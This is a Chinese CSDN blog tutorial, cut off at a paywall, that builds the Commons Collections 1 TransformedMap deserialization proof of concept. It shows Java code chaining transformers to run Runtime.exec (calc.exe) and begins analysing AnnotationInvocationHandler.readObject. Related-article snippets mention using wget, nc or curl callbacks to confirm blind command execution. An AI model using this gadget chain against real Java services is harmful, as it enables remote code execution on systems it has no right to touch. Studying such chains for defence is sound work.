java安全(八)TransformedMap构造POC

已于 2022-08-06 06:23:29 修改
阅读量1k 收藏
点赞数 1
分类专栏: Java安全 文章标签: java 安全 安全漏洞 信息安全
于 2022-07-31 15:47:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45694388/article/details/124529538
版权

给个关注?宝儿!
给个关注?宝儿!
给个关注?宝儿!

上一篇构造了一个了commons-collections的demo
【传送门】

package test.org.vulhub.Ser;



import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.util.HashMap;
import java.util.Map;

public class CommonCollections1 {
   
    public static void main(String[] args) throws Exception {
   
        Transformer[] transformers = new Transformer[]{
   
                new ConstantTransformer(Runtime.getRuntime()),
                new InvokerTransformer("exec", new Class[]{
   String.class},
                        new Object[]
                                {
   "C:\\WINDOWS\\system32\\calc.exe"}),
        };

        Transformer transformerChain = new
                ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        Map outerMap = TransformedMap.decorate(innerMap, null,
                transformerChain);
        outerMap.put("test", "xxxx");
    }
}

了解了Transformer,接下来尝试构建poc

AnnotationInvocationHandler

这个漏洞核心,是想Map中加一个新的元素,在demo中,我们通过手工执行 outerMap.put(“test”, “xxxx”); 来出发漏洞。但是在实际反序列化中,还需要有一个雷,使他在反序列化readObject中有类似写入的操作

就是:sun.reflect.annotation.AnnotationInvocationHandler

AnnotationInvocationHandler的 readObject方法:

private void readObject(java.io.ObjectInputStream s) 
	throws java.io.IOException, ClassNotFoundException {
    
	s.defaultReadObject()

	// Check to make sure that types have not evolved incompatibly</
最低0.47元/天 解锁文章
b1gpig安全
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
java poc_无回显命令执行PoC编写指南(Apache Shiro Java反序列化)
weixin_32058991的博客
02-16 636
无回显漏洞存在与否,无法从web获取到标志性的信息,Java反序列化漏洞即属于该类型。验证方法针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。该方法可行,不过缺陷有以下几点:修改了目标机的文件系统不具有通用性,如windows没有nc、linux没有wget的情况。涉及到TCP数据传输,执行速度慢一种更好的方式是使...
java poc_spring系列cve poc编写
weixin_33880392的博客
02-13 1082
本来是自己写在有道云笔记的,存粹是为了练习下python代码,也懒得打码了就是自己搭建的个漏测环境,师傅们手下留情.0x01 cve-2018-12731.1 漏洞检测访问目标/users?page=&size=5抓包,修改post包POST /users?page=&size=5 HTTP/1.1Host: 49.235.54.135:24814User-Agent: Mozil...
手把手教你写JAVA反序列化的POC
Ms08067安全实验室
07-20 1989
0x01 前言前面,我们了解了java的序列化机制,也知道在什么情况下会出现漏洞,为了对反序列化漏洞有个更直观的认识,这里就来说一说存在于apache commons-collectio...
java 反序列化CC1链分析(TransformedMap)
wsitcj的博客
03-14 1389
Map类 --> TransformedMap Map类是存储键值对的数据结构。 Apache Commons Collections中实现了TransformedMap ,该类可以在一个元素被添加/删除/或是被修改时会调用transform方法自动进行特定的修饰变换,具体的变换逻辑由Transformer类定义。也就是说,TransformedMap类中的数据发生改变时,可以自动对进行一些特殊的变换,比如在数据改变时,进行一些我们提前设定好的操作。 TransformedMap.decorate方法
Java代码审计——Commons Collections TransformedMap调用链
王嘟嘟的博客
11-05 870
0x00 前言 CC链最基础的就是迭代链:Java代码审计——Commons Collections 迭代调用链,核心就是 ChainedTransformer的Transformer方法。那么TransformedMap就是可以调用此方法的一条链。 0x01 TransformedMap调用链 在CC包中, 有TransformedMap这样一个类,他在进行put,checkSetValue等方法时,可以触发transform方法,如下图所示。 1. 先上poc: Transformer[] trans
java_poc:Java POC MAVEN应用程序
05-16
java_poc Java POC MAVEN应用程序
java-poc:小型POC的空间
05-06
Java POC 该存储库包含小型POC 名称 描述 休息 根据端点或接受标头返回JSON或XML。
java-poc
03-11
java-poc
基于Java Swing的漂流瓶PoC,作为课程设计
11-03
该资源内项目源码是个人的课程设计作业,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到94.5分,放心下载使用! 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用!...
NewDeal:Java8的技术POC
04-30
新价钱 Java技术的POC。 CompletableFuture演示。
java-poc:概念证明和Java技巧
04-30
注意: : 优先级警告...使用 Khallware(Java概念验证) 概述 这是一些用Java编写的简单,独立的概念证明。 主题包括: -简单的Java构造,data_types和语言功能 -通用软件设计模式 -计算机科学算法 -各种核心Java技术 -j2ee技术的各种子集 -通用Java
POC编写指南
03-27
转载自Medici.Yan,以真实案例为背景,针对当下主流的漏洞来分析漏洞,并且一步一步编写对应的 PoC
直播预告 | 今晚8点 1小时教会使用Java编写POC
Ms08067安全实验室
01-07 114
— 实验室旗下直播培训课程 —来和20000+位同学加入MS08067一起学习吧!
poc框架及poc编写
weixin_48776804的博客
07-24 705
poc框架及poc编写1 pocassist2 pocsuite33 主要是两个框架,第一个相对好用一点 1 pocassist 2 pocsuite3 3 其他poc https://hub.fastgit.org/WooYun/TangScan
java反序列化漏洞 poc_Java反序列化漏洞详解
weixin_39812142的博客
02-13 954
Java反序列化漏洞从爆出到现在快2个月了,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具。本文对于Java反序列化的漏洞简述后,并对于Java反序列化的Poc进行详细解读。Java反序列化漏洞简介· Java序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,Java中的ObjectOutputStream类的writeObject()方法可以实现序列...
POC原型开发:巡店
杨江的IT分享专栏
10-03 3082
一期工作结束,结果见这里工作列表:1.首页导航2.我的GPS位置3.GPS签到,签出4.连续GPS跟踪5.拍照,上传6.图片列表7.任务下发8.任务接受9.任务反馈(反馈信息,完成状态)7.登录,退出============================================================技术要求:支持目前市场上销售的BlackBerry OS 7.1手机,比如990
transform TransformedMap利用链
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
01-25 566
引入环境: <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </dependency> <dependency> <groupId>commons-collectio
Java开发常见专业术语
热门推荐
weixin_42408447的博客
05-10 1万+
1.脚本 脚本(Script),是使用一种特定的描述性语言,依据一定的格式编写的可执行文件。 2.http协议 HTTP协议,即超文本传输协议(Hyper text transfer protocol)。是一种详细规定了浏览器和万维网(WWW = World Wide Web)服务器之间互相通信的规则,通过因特网传送万维网文档的数据传送协议。 3.B/S结构和C/S结构 B/S(Browser/Server):指浏览器和服务器架构。 C/S(Client/Server):指客户端和服务器架构 4.报文 报文
[Java安全]CommonCollections1_TransformedMap
cosmoslin的博客
03-08 668
CommonCollections1_TransformedMap 本机环境: JDK版本:jdk1.7u_51 CC版本:Commons-Collections 3.1 import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.Const
数据安全中心系统 poc
最新发布
12-23
数据安全中心系统 poc(Proof of Concept)是指在数据安全领域中的一个概念,它通常用于指代一个关键性的概念验证阶段。在数据安全中心系统中,POC是用来验证和证明新技术、新工具或新流程是否可行和有效的关键性...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1gpig安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值